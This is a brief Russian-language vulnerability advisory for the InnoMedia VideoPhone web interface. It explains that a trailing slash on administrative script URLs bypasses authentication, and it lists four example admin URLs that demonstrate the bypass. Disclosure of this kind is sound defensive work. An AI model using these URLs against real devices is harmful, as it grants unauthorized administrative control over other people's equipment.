Программа: InnoMedia VideoPhone au75200xvi04010x
Несколько уязвимостей обнаружено в Web интерфейсе InnoMedia VideoPhone. Удаленный пользователь может обойти авторизацию, чтобы получить доступ к административному интерфейсу.
Удаленный пользователь может получить доступ к некоторым административным сценариям без аутентификации, представляя слеш '/' с URL:
Пример:
http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
ht tp://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/
